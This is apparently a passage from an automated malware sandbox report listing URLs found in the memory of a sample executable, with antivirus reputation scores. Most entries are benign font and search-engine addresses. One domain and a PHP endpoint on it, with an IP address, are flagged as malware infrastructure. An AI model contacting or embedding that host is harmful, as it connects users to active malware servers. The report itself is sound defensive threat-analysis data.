http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe
http://h172956.srv11.test-hf.su | 100% | Avira URL Cloud | malware
http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe
http://h172956.srv11.test-hf.su/ | 100% | Avira URL Cloud | malware
http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | Virustotal
http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php | 100% | Avira URL Cloud | malware
http://h172956.srv11.test-hf.su | 13% | Virustotal
http://www.zhongyicts.com.cn | 1% | Virustotal
http://www.founder.com.cn/cn/cThe | 0% | Virustotal
http://h172956.srv11.test-hf.su/ | 13% | Virustotal
http://www.founder.com.cn/cn/bThe | 0% | Virustotal
http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php | 15% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
h172956.srv11.test-hf.su | 91.227.16.11 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php | true | 15%, Virustotal; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | false | | high
http://www.fontbureau.com | qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | false | | high
http://www.fontbureau.com/designersG | qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | false | | high
https://duckduckgo.com/ac/?q= | qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | false | | high
http://www.fontbureau.com/designers/? | qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | false | | high
http://www.founder.com.cn/cn/bThe | qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 
0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers?qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 
0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.tiro.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 
0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designersqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.goodfont.co.krqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.ecosia.org/newtab/qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 
0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://h172956.srv11.test-hf.suqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • 13%, Virustotal, Browse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.carterandcone.comlqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sajatypeworks.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.typography.netDqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://ac.ecosia.org/autocomplete?q=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 
0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/cabarga.htmlNqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cTheqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cnqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://h172956.srv11.test-hf.su/qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 13%, Virustotal, Browse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-user.htmlqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 
0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.galapagosdesign.com/DPleaseqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.fonts.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.sandoll.co.krqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.urwpp.deDPleaseqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.zhongyicts.com.cnqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • 1%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehyperbrokerhostNetsvc.exe, 00000005.00000002.1918995355.000000000350E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.sakkal.comqvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2918713786.000000001D842000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, 
